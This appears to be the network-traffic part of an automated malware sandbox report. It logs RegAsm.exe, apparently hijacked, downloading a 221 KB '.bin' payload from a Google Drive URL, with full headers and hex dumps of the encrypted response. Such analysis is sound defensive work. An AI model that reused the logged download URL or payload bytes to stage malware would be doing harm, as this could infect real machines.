                                    Set-Cookie: NID=511=jbxXVel1QC5cp4BIShMr9vLZ0C2yojRi9u3v301lLywcP4FXVO4u6F3LAUe9EZc1hq3S7lE2BfvOJEKgvNg2BvWN7bwfATqLrFSBOmMahyHMGV90RoqIgNLX9MOt6zMEe9-X8CLqPP3BohIq7IqejGdgaNkCQupfSKyzZjNr4gg; expires=Tue, 29-Mar-2022 16:40:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                    Accept-Ranges: none
                                    Vary: Accept-Encoding
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    2021-09-27 16:40:45 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 39 63 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 38 70 67 6b
                                    Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-9c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgk
                                    2021-09-27 16:40:45 UTC1INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.11.2049806142.250.185.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    TimestampkBytes transferredDirectionData
                                    2021-09-27 16:40:46 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k3vc3ju64ugjuf54q6v6uu1oc/1632760800000/13596271228415839806/*/1ycJKsjL72mds_kr72amoQuYUYdcifxy0?e=download HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Cache-Control: no-cache
                                    Host: doc-04-9c-docs.googleusercontent.com
                                    Connection: Keep-Alive
                                    2021-09-27 16:40:46 UTC2INHTTP/1.1 200 OK
                                    X-GUploader-UploadID: ADPycdt4xI0GKxnKfHUwcBMwpkCxhk8w-VAi3EtRKQi6FN3tMR_DUmtb44GYcljRfNqVb1qxov6L7L7IxJ0rLdNuZx4
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: false
                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                    Access-Control-Allow-Methods: GET,OPTIONS
                                    Content-Type: application/octet-stream
                                    Content-Disposition: attachment;filename="official 1_kBQauNT10.bin";filename*=UTF-8''official%201_kBQauNT10.bin
                                    Date: Mon, 27 Sep 2021 16:40:46 GMT
                                    Expires: Mon, 27 Sep 2021 16:40:46 GMT
                                    Cache-Control: private, max-age=0
                                    X-Goog-Hash: crc32c=8/wjqw==
                                    Content-Length: 221760
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                    Connection: close
                                    2021-09-27 16:40:46 UTC5INData Raw: 9e 4e 4c 5f b2 7e ef 2d af 40 ea c2 53 a4 35 67 28 e7 68 f3 cf 51 e3 79 f7 ab 21 dc 4c 4a 62 a0 f1 37 6f 47 c5 21 d3 76 21 b9 f9 96 a8 05 de 07 4a 54 cd 26 3f 3c 70 22 6f a4 c7 eb aa 9d 52 81 7f d5 3e 1f a3 fe ed 08 50 76 50 5c 34 0f fe 38 be 92 5b 78 ed ba 04 da 1e 59 3c 3b 85 31 e6 c7 79 65 58 06 fd c3 03 62 2d c1 40 86 83 8b 0b f3 ef 7c 5f cd 3e 98 7e 59 14 f9 dc 22 53 76 92 e5 e5 f8 f1 ca bf 07 76 44 b3 71 82 25 27 14 3c e4 c8 0a 7f c1 88 4d 8d d9 7e ab e7 89 a9 94 50 c4 ca 35 39 9f ca 71 96 2d d8 c5 8e 93 22 58 10 17 5a e8 1e 8e 95 f6 aa 9d cd 5c bd 57 0b f1 7e bb 37 bd e4 a1 37 a1 27 12 63 03 d8 06 3d e1 3d 4d 36 f6 90 b7 4f fd 16 c3 75 f4 3e b3 5f db ed 80 41 30 26 5f 78 c8 05 cd 76 17 de d6 65 a2 26 eb 94 5a fa 66 1f ba cc b8 78 68 aa a1 36 1b 12
                                    Data Ascii: NL_~-@S5g(hQy!LJb7oG!v!JT&?<p"oR>PvP\48[xY<;1yeXb-@|_>~Y"SvvDq%'<M~P59q-"XZ\W~77'c==M6Ou>_A0&_xve&Zfxh6
                                    2021-09-27 16:40:46 UTC9INData Raw: 7f 60 e0 a1 36 13 7d 02 c6 65 fc 2a 9c f4 b7 76 a7 53 e6 da 4c 2c 79 80 98 53 18 2b 7b 9e d7 a1 48 8e d5 1c 98 f8 06 30 f7 df ef 86 09 5a 47 ba 6c 36 e1 9a f7 01 59 f0 cd ff b6 98 f7 61 ce 99 5e bc c8 27 91 88 bc b8 70 03 62 3a 2e 7e 96 cb 6f 34 c5 f2 37 3e 99 4e 95 8f 97 34 0a 65 2c ac 11 d9 fc 74 97 63 1a 2b 51 80 62 4a 83 4a be 4a 8a 4e f6 72 3e 9d 71 23 1e e3 87 28 21 7b 60 2c c6 89 31 d1 75 0e 1d b1 92 44 6a 31 9e fb 66 2e 4e b8 9e 3a 17 d1 f8 f5 cf 50 8d 18 a5 d5 1f c3 de e8 c2 8e 23 9e 5f 01 52 23 04 d4 17 30 0b 4a ed 41 72 35 40 40 9e 80 8f 7a 3a 8a 48 5e fd b8 56 36 a3 02 47 71 34 50 92 b0 ca 65 b8 10 7a 90 45 f7 03 a4 ba 98 88 84 47 74 6c ef 49 51 75 d2 0e 25 28 14 e2 40 e3 99 27 39 ae ac bc b1 3c da 2f a0 a2 4f 96 1f 14 43 06 3e 08 78 2e 9f 6c
                                    Data Ascii: `6}e*vSL,yS+{H0ZGl6Ya^'pb:.~o47>N4e,tc+QbJJJNr>q#(!{`,1uDj1f.N:P#_R#0JAr5@@z:H^V6Gq4PezEGtlIQu%(@'9</OC>x.l
                                    2021-09-27 16:40:46 UTC12INData Raw: 17 4a 7f 33 2e 9b c4 21 9e 8b 64 4b eb 0a c1 5c 88 c4 bb 5a 1c 69 13 97 5e 22 e4 13 a8 bb 2e c6 61 85 a7 bd 1e 15 eb 74 ae 93 a5 46 8c 83 79 6f 5c dd de 9d 0d 0c a3 9e cb 44 b0 f3 a7 ee 5b c9 60 4f d4 f1 22 5e f5 99 65 e0 af 6a d1 63 c0 f0 08 ef 39 7d d4 f7 81 05 8b f9 ad 29 32 41 b3 42 d0 85 fb bd 22 e9 1b b5 b5 35 05 06 b2 3b f0 a8 cf 6b 04 51 b4 30 ce 17 d3 7e 0a 91 b5 7a 27 1a 82 bd d4 f7 52 c7 17 13 44 e1 ba 0c 11 68 84 ce 2f d3 9d 42 52 3e 5e c9 f8 33 53 80 87 58 43 04 f4 30 0c d4 90 4d 92 b2 31 a5 11 61 a2 f3 8e 67 f0 76 f2 ad cb b5 bf ce 83 22 0d 35 50 7a 08 b8 d0 f9 e9 c4 12 dc 08 8f f1 9b 18 f5 bb 56 b5 96 fe 30 31 59 5c 6b 61 81 b0 25 97 e9 fc a3 c8 85 94 5d 3a c5 d2 82 3c cb 6b 20 09 59 94 fd 64 47 e4 93 86 dc 4a 08 03 59 f7 90 85 66 25 14 09
                                    Data Ascii: J3.!dK\Zi^".atFyo\D[`O"^ejc9})2AB"5;kQ0~z'RDh/BR>^3SXC0M1agv"5PzV01Y\ka%]:<k YdGJYf%
                                    2021-09-27 16:40:46 UTC16INData Raw: db b7 94 62 30 a4 e6 1c 3c e7 a4 05 73 ef 15 2b ac 4c 24 22 54 3d 0f b2 97 04 07 a3 4e 46 64 16 78 54 0a 96 0c 62 81 2f da 25 92 96 cf a9 81 c2 9a 39 82 f4 1a c4 9e 79 8f da 68 a9 ac 99 60 7f c0 d8 7c 8f e5 f5 0b e4 20 e7 75 3a 8f 07 59 da f2 06 e3 8c 7f 2e c7 0e 36 3f 1e d3 05 d6 e4 08 07 3b bf 6f 4a 69 f9 14 de c4 6b 34 45 11 9d 6c 6b c1 a5 20 d1 50 ec 68 56 08 1e 52 9f 8a f2 ab f2 be dc 8a e5 2c b9 ec 75 8b 67 2a 88 c3 c8 c4 70 25 bf 51 f0 27 05 71 c9 2e 7d 90 7c 21 57 d7 c0 72 fe 5d 42 ae 1f aa d8 fc 0f 7c be 52 5c cd f6 d6 0a 04 92 5d 50 ca ba 04 d0 31 94 3c 3b 8f 17 f7 c0 51 ac 5a 06 fb d2 05 4a 1f c3 40 80 ab ac 0b f3 e5 13 92 cd 3e 92 58 48 13 d1 16 20 d3 70 9a cd d9 e5 4b c2 97 94 7f 89 98 a6 4e 69 ea 3f 4e 9d a6 51 6c b3 fa 24 85 66 1f c6 cd cc
                                    Data Ascii: b0<s+L$"T=NFdxTb/%9yh`| u:Y.6?;oJik4Elk PhVR,ug*p%Q'q.}|!Wr]B|R\]P1<;QZJ@>XH pKNi?NQl$f
                                    2021-09-27 16:40:46 UTC18INData Raw: 8b 01 51 fe 3c 45 e5 58 9a 7e 5f b6 e8 9c 0a a8 76 92 ef c3 80 49 c4 b9 9b 57 89 92 cf 92 6e 85 e7 68 8c ab 51 8f b3 fa 24 c2 85 1d c6 c1 85 b0 fa 3e a1 96 7d 59 fa ec 2b 9f 43 f8 a6 c8 9d 66 17 45 ea ba 87 7a eb 93 cc a7 97 e3 48 ae 50 23 c9 7e bb 6d 26 9a df 75 a0 24 16 43 9c ff 4f aa e1 3d 47 1e de 90 b7 a9 ec 13 ad ac f5 35 b9 77 a7 ee 80 4b 57 be 5f 78 c2 7b da 48 61 d9 fe 20 80 26 ed bc 0d f8 66 19 d5 f4 b8 78 42 82 fb 34 19 14 61 bf 65 f6 27 98 d9 e9 34 8f 02 e3 fa 5a 23 03 80 f7 14 30 4d 73 99 c6 e6 7a 8e d5 1c b7 27 36 5f be f7 c6 8c 0e 74 23 d2 6e 30 88 e2 8d 01 53 f1 3b bd 9c af f1 0e 95 8d 4d b1 e7 70 c3 88 b6 6c 7c 1f 05 07 50 70 97 a4 38 22 f6 d6 04 58 f0 4c 93 9f 97 d9 08 65 20 ab 27 91 27 1b c3 69 32 ea 5c 89 1b 37 ef 48 b4 5f a6 78 f2 1d
                                    Data Ascii: Q<EX~_vIWnhQ$>}Y+CfEzHP#~m&u$CO=G5wKW_x{Ha &fxB4ae'4Z#0Msz'6_t#n0S;Mpl|Pp8"XLe ''i2\7H_x
                                    2021-09-27 16:40:46 UTC19INData Raw: b0 64 a7 71 c0 f0 02 4d 26 6f d1 f9 81 14 80 e6 a0 d7 29 6d a4 4a cf 8f d3 b9 07 e3 1d da 21 35 05 0c ee 50 f0 a8 ca c9 1b 5f bd 34 ce 07 d7 61 1d 6f f6 5c 3d 1d a4 c9 d6 f7 04 b3 0b 13 4b e5 c4 14 0b 68 80 e7 53 d3 9d 48 06 2b 46 da f2 33 42 84 f0 ac 42 28 e3 39 1b fc f3 4d 92 b9 3d b7 13 49 b0 fb 8e 61 d6 0c f2 ad 4b 1d a4 dd 8b 22 1c 31 55 76 f6 b8 fc f4 e0 db 8d fe 79 8d ff 9d ba ea 12 4f b1 96 e0 34 2e 52 b8 6a 4d 8c b9 3b e9 f1 4f a9 cc 27 85 51 29 c1 13 99 38 d4 6e de 08 75 82 f4 79 6e c2 93 86 d6 1c 1d 08 4a 80 91 94 62 5d 0a f7 5c 24 cf 60 07 69 e9 04 23 86 88 26 22 8f 1f 28 b2 30 0f a5 b2 8a 52 4c d2 74 54 0c 90 24 f4 81 2f d0 0d 56 94 63 a3 a9 e5 b2 39 88 56 df 88 87 51 5e d8 68 af a7 9f 48 e8 c0 d8 76 a7 d5 fb 0b e2 85 c0 75 3a 04 a8 48 9a d5
                                    Data Ascii: dqM&o)mJ!5P_4ao\=KhSH+F3BB(9M=IaK"1UvyO4.RjM;O'Q)8nuynJb]\$`i#&"(0RLtT$/Vc9VQ^hHvu:H
                                    2021-09-27 16:40:46 UTC20INData Raw: 0a dd 7b ad 6b e2 f7 a5 7b b1 20 04 a4 ae a5 64 2a f2 39 4d 27 f2 8e 49 ae d1 16 e9 7b cd 4d 4c a0 7c e6 97 97 34 2e 56 f6 7f 3a be b7 9e 22 c0 4f 82 3d db 90 5a 7d 64 1f ba a4 b8 78 59 82 78 34 19 14 43 b5 bb f7 2d 8d 88 fc 08 bd 59 e1 fe 70 5a 68 87 89 05 18 2b 75 f6 20 cf 06 88 c3 e8 9e 99 2f 5f b8 db f9 72 0f 12 27 88 7d 37 e1 2b f6 01 55 e6 e2 dd 57 99 f1 08 8e 9e 76 6c cd 48 c5 99 bb c9 5b 0a 16 04 06 a5 95 a4 3a 1c e2 f8 1f 7a f4 ac 92 99 b9 9a 11 65 26 be 33 f9 9b c4 c2 63 1c 3e 55 04 04 1f 83 4b a7 49 9f 4f e4 1f 40 6c 71 29 07 44 87 3d 3c a3 f2 34 fa 97 46 aa 22 0e 19 19 5f 8a 79 3f 10 ec 7e 5b 31 c1 9e 30 c1 ea d9 e5 c0 28 92 c6 b7 f9 00 b9 de e2 e0 02 30 8e 42 0d d8 0a 14 c8 63 f9 0b 4c c3 e3 63 25 5c 6e 3c 91 9d 64 40 28 4f c1 d5 c9 56 36 a9
                                    Data Ascii: {k{ d*9M'I{ML|4.V:"O=Z}dxYx4C-YpZh+u /_r'}7+UWvlH[:ze&3c>UKIO@lq)D=<4F"_y?~[10(0BcLc%\n<d@(OV6
                                    2021-09-27 16:40:46 UTC22INData Raw: 33 48 8e 40 15 42 28 ec 1c 33 cb e9 4d 98 b4 3f 9f ec 49 cc fb 9d 65 f8 0c f6 ad c1 9a df dd 87 23 11 e1 33 76 f6 b8 d4 e0 e0 db 11 dc 79 8c f1 97 b3 64 01 9d 09 85 ea 22 25 43 a6 05 4c 8c b9 31 e0 e0 f9 b1 cd 0f ca 51 29 c7 f4 94 4e b8 b1 a2 08 75 99 dc 6d 6f c2 99 ae d6 e9 17 02 26 a8 b8 05 62 3a 0c 40 4f 2d d9 71 01 60 e0 17 25 af b3 06 22 56 15 28 c1 95 0f a5 b8 1d 56 5d d6 15 55 0d 90 2e fd 90 28 45 63 7e 97 ce af a3 f4 92 28 80 39 0f 85 87 5b 63 9a 68 af bb b9 59 e1 af 0a 76 a7 2b fd 23 da 08 c0 7f e4 8a b4 4f 8b d3 fc 5c a4 4d 06 ab 06 e8 39 22 de 03 fc ee 66 db 3b bf 65 72 ff f9 02 c8 ba d4 2e 45 15 f0 5f 9e c7 a5 b6 f9 9a ec 43 5c f6 0e 04 bf 88 f2 a9 95 e8 38 88 e5 2e b9 d9 75 8b 67 bb e4 a3 e4 a1 6d 5c b5 96 f2 23 2b 26 c0 06 49 ba 79 26 7f fa
                                    Data Ascii: 3H@B(3M?Ie#3vyd"%CL1Q)Numo&b:@O-q`%"V(V]U.(Ec~(9[chYv+#O\M9"f;er.E_C\8.ugm\#+&Iy&
                                    2021-09-27 16:40:46 UTC23INData Raw: fa 5c 0d f9 a0 f7 1e 1c 55 55 99 c0 ca 2a b0 ab 35 9f e7 30 48 8b c7 91 a9 0e 72 0f 36 db 26 bf e6 df 4b 53 f7 e3 9f b1 45 a2 09 9f 99 75 a8 b1 6b c3 88 b8 aa 4f 1d 68 25 2e 7e 93 2a 8b 22 f4 f4 37 3b 9b 4e 95 b4 ba c7 39 62 26 ba 0a b7 f4 1b c5 61 04 61 b7 89 11 1f fd 47 b4 59 8a 77 1d 1f 68 9b 59 69 0d e6 9c 1e 32 db 58 25 ea 8b 10 4e 20 0e 1b 93 6a 9a 60 33 32 f5 6e 41 1d 65 63 36 cb f9 a8 ff cf 56 83 ee 99 ff 28 c5 c8 ca c4 a0 21 94 4f 30 dc 1b 04 d4 63 e6 0b 4c c3 3f 7a 35 41 6c f1 49 8d 7a 49 f4 76 d1 fd b6 39 ff a3 02 4f ab 13 78 d0 2b ce 00 71 10 7a 9a 2a 18 03 a4 1d 4b a0 96 5d 70 7a c6 7c 61 70 d8 0f 0a 47 6a ff 40 e3 8c 5b 19 e7 ac b8 d4 81 e9 2f aa be 9f ff 3f 5f 43 0c 3e 61 1b df 9d 66 38 9d b0 4e 4b fa 04 c8 b1 77 d3 69 55 6b 7e 03 8f 72 7c
                                    Data Ascii: \UU*50Hr6&KSEukOh%.~*"7;N9b&aaGYwhYi2X%N j`32nAec6V(!O0cL?z5AlIzIv9Ox+qz*K]pz|apGj@[/?_C>af8NKwiUk~r|
                                    2021-09-27 16:40:46 UTC24INData Raw: 3b dc 08 73 b0 d0 79 6f c8 13 8e d6 e8 13 d5 1f f1 90 94 4a 3e 06 f7 5a 44 c6 61 07 79 86 0f 23 84 82 0e 26 52 15 2e dd 9e 0f a5 b8 61 54 4d d2 70 42 f2 91 7b f6 9e 3d 2e 0c 40 6a ce f0 ab c5 3e 39 88 56 f5 85 91 af 4a 87 6a 8f 18 9f 48 e9 3e d9 60 59 20 a8 27 88 0a 4c 0a 3a 85 a4 27 96 db cd e9 e3 72 07 ab 06 1e 29 35 f4 03 b9 73 67 cb 31 93 70 70 73 86 14 de bb 0a 38 44 15 fb c4 89 c3 a5 22 24 45 ed 68 5c 88 17 2c 91 8e da be 9d 96 1c a0 c1 2a 91 2c f5 83 6d d4 8d dd ec ab 61 26 95 1a 8d 27 03 61 af 0a 4e 92 76 0f 5b f0 c0 78 74 3a 8f ae 1b b4 7e ca 08 54 72 8d fa ca f0 fe 3a be ba 16 78 ed bc 2c 39 5c 59 3a 2d ad 1f e6 c7 73 73 6b 1f 83 cb 03 62 29 e9 a4 84 83 8d 23 d7 ef 7c 55 4d 36 98 7e 5d 2c 91 dd 22 d3 74 2a cd a6 e7 4b c2 97 56 7d 89 94 df ab 47
                                    Data Ascii: ;syoJ>ZDay#&R.aTMpB{=.@j>9VJjH>`Y 'L:'r)5sg1pps8D"$Eh\,*,ma&'aNv[xt:~Tr:x,9\Y:-sskb)#|UM6~],"t*KV}G
                                    2021-09-27 16:40:46 UTC25INData Raw: e2 1a c3 69 09 39 43 a2 02 04 83 5b af 47 70 5e de 17 79 96 6b ff 1e ed 89 24 38 be 50 34 f1 90 04 40 23 22 11 bd 5f 95 0f 11 b0 fd 68 5e 24 ab 85 30 da e2 cc 09 ce 7a 8e d7 bc e7 fe d0 d5 f9 f9 bb 21 8f 42 14 5b e5 05 f8 16 ff 00 5d c9 97 61 3e 5e 4a 8d 9b 8d 6b 58 9d a0 d0 d1 b1 4e 25 b8 02 54 6a 72 48 2e 2a e6 61 ba 01 71 b8 51 f6 03 ae 04 26 97 8f 4e 6f 6c ff 49 7e 52 2c 18 08 26 16 e6 4b cb 9e 24 11 ed bf b8 a4 6b fa 34 a0 b2 5e 8f 2c a0 42 2a 3e 76 38 34 49 75 35 94 84 73 50 fa 1f c5 50 6c 3b 96 78 1b 74 12 84 5e 14 e5 13 a4 0a 21 cd 69 92 bc ac 0b 19 0a 69 7c 91 91 40 a0 91 69 6b 4f 21 ce ba 17 15 da a5 a7 46 ba e6 0a eb 55 de 7b 5e c1 f5 2c 86 0a b4 44 e7 b2 75 a4 53 d6 f1 0c 47 35 7a d8 d4 92 0f 8f f7 bb c8 20 93 a5 67 c5 9e d8 a3 f4 fa 16 c5 3b
                                    Data Ascii: i9C[Gp^yk$8P4@#"_h^$0z!B[]a>^JkXN%TjrH.*aqQ&NolI~R,&K$k4^,B*>v84Iu5sPPl;xt^!ii|@ikO!FU{^,DuSG5z g;
                                    2021-09-27 16:40:46 UTC27INData Raw: f7 c1 d8 7c 8f 73 f7 0b e4 1b d4 64 2e 94 b5 40 b2 8a cd e3 8a 66 14 ac 60 15 39 36 f4 05 d6 ee 47 8b 60 9c 65 72 ff f9 14 de 4a 5a 6d 6d 84 f1 44 a4 74 b2 f0 74 b1 ec 68 5d e5 0c 3d 83 9b e1 a8 f2 b5 1a 88 e5 2a 91 26 55 cb 36 fc 96 a2 e4 a1 49 02 96 96 f8 23 2b 77 c3 06 49 fd 65 26 7f fa ec 60 e5 36 9e bd 19 b8 d6 bc 08 54 70 43 5b 16 5a fe 38 06 83 5f 69 fe bc 1d f2 0f 59 3c 3d 96 36 3b 5f 79 65 58 2e ca c3 03 68 05 f9 40 86 89 56 89 f3 ef 7c 57 ed 3a 18 7e 59 27 83 df 33 df 19 8f e4 eb ed 24 da be b3 75 a1 c0 c9 83 6f f9 22 79 9b b0 69 57 99 aa 22 ea ad 0c d3 c0 86 eb fa 3e ab be 15 5b da aa 58 c0 43 f8 ac e0 b3 66 e7 7c 6e 1f 16 7a eb b1 4c b0 41 64 77 bd 57 0a e2 68 aa 72 e9 f2 a6 17 83 24 12 5a af 89 67 1d a1 66 65 29 f7 90 bd 87 dd 15 c2 74 e4 31
                                    Data Ascii: |sd.@f`96G`erJZmmDtth]=*&U6I#+wIe&`6TpC[Z8_iY<=6;_yeX.h@V|W:~Y'3$uo"yiW">[XCf|nzLAdwWhr$Zgfe)t1
                                    2021-09-27 16:40:46 UTC28INData Raw: 75 73 35 4b 1c 8c 80 8d 61 50 8d 4f d6 ec b5 d8 81 bb d8 53 ed 1e 75 d1 2b c0 7c b0 01 72 84 6d ed 00 a4 11 22 05 91 5d 74 6d fd 5e 70 7c c4 08 21 00 05 f7 40 e9 2a 34 1d f4 a7 ad b0 5c fd 38 2d 8c 45 90 36 4d 4e 17 39 71 24 b2 8e 6b 16 28 98 60 41 eb 03 c8 df 5a ce 86 5f 03 ec 2b 9e 76 02 ee 00 ab 6d 23 d2 72 9a aa 72 16 13 1d 59 85 81 b5 3a df 83 68 61 99 2a ce b6 2e 50 b5 b6 a0 4d b9 86 26 f5 48 c7 73 57 c1 e7 22 a7 9b 97 69 e9 ba 68 71 77 d1 f9 20 4a 37 66 a8 a4 81 14 85 3a a8 fd 33 6d a4 4a d3 8f d3 bb 22 07 1d 8a 11 34 09 0c dd 5a f0 aa c5 92 1a 53 c0 35 c2 06 d7 61 1d 7c 84 53 3d 74 aa c9 d6 cf 54 b9 1a 05 48 ce a5 14 19 71 7e e7 7f dd 9f 5e 5e 37 44 54 4b 1b 77 85 9d ac 58 24 ec 31 01 02 e8 61 82 bb 2b b0 11 c7 7b f2 00 d6 f0 39 f3 ad cb 0c a8 dd
                                    Data Ascii: us5KaPOSu+|rm"]tm^p|!@*4\8-E6MN9q$k(`AZ_+vm#rrY:ha*.PM&HsW"ihqw J7f:3mJ"4ZS5a|S=tTHq~^^7DTKwX$1a+{9
                                    2021-09-27 16:40:46 UTC29INData Raw: 8b 91 60 22 9d 48 fe 36 25 4c c7 17 69 fd 2b 27 7f fa 1c 75 fe ec 96 a9 15 7e eb ea 02 8a 67 75 74 fc f0 fe 32 15 bb 73 40 ed ba 0e 04 5e 5e 16 3d af 70 9a c7 79 67 58 06 fd 77 03 62 2d e0 40 86 83 5e 0b f3 ef 6d 5f cd 3e 98 7e 59 14 fb dc 22 d3 81 92 e5 eb c6 4b c4 bf ab 7e 89 92 d8 83 69 ea 35 68 8c a1 7b 5f b1 fa 25 e8 ab 1f 33 c7 ea c8 06 3c ab be 19 5b fa ea 03 e3 43 f8 ae e0 b3 66 bd 40 37 37 a8 7a eb bb 22 a4 97 e9 50 bd 57 0b f1 7e bb 67 f8 e4 a1 7b a6 24 12 5a 44 8a 67 3d 10 3e 4d 36 f9 90 b7 af e7 14 c2 7f e6 05 b6 5f 0c ee 80 41 02 26 5f 69 de 16 c9 70 e1 dd d6 65 82 37 ef 8e a4 fb 4a 17 b3 93 98 ae 45 b1 b2 32 19 03 4d df 9b f7 01 80 99 f2 5e 9c 58 e1 f0 57 11 6a 84 f7 0f 1c 37 8f 98 ec c1 04 87 bf 1e 89 8d 33 77 84 de ef 86 13 61 0f b8 7d 34
                                    Data Ascii: `"H6%Li+'u~gut2s@^^=pygXwb-@^m_>~Y"K~i5h{_%3<[Cf@77z"PW~g{$ZDg=>M6_A&_ipe7JE2M^XWj73wa}4
                                    2021-09-27 16:40:46 UTC31INData Raw: 06 9f 60 4b fb 1d d5 5e 7d d3 90 7c 04 76 03 85 d4 13 ef 04 b1 21 bd ed 72 81 a6 0e 0b 09 0d 64 8b 32 ac 5e 91 95 e4 54 45 23 de 13 17 0e af ac 2a 79 b0 f5 04 56 59 c6 73 54 c1 e4 27 b4 ef 38 47 e9 b0 65 bc 77 d1 fc 1a 5a ba 7e cb e4 97 88 9e ea b8 c0 af 7c a8 52 d9 13 c2 b5 38 ff 81 cb 23 22 2d ab dd 5a fa 8e da c4 08 50 a7 25 c1 19 c1 9f 1c 43 b9 47 31 05 3a f0 34 0c ab 46 14 04 57 ea c4 05 1e 7f 7e e7 7f d0 85 5b 56 21 57 d5 ea cd 43 a8 9e b1 51 27 ec 28 14 e3 f5 b3 93 94 3f 9c 16 71 52 0a 71 9e de 78 d7 ad c1 15 8e dd 87 22 07 01 47 76 a6 b9 fc f4 dc db 1b e5 51 90 f2 9d bc c2 7e 45 b1 9c c7 2a 2d 52 a4 42 69 8d b9 31 e4 e3 ff b7 df 23 99 55 3f d3 d3 85 2b d1 73 db 1e 66 9e e6 7f 7b d1 94 94 d1 fe 3f 52 4a f3 96 b2 65 12 47 f6 5c 21 c5 be 17 56 c1 33
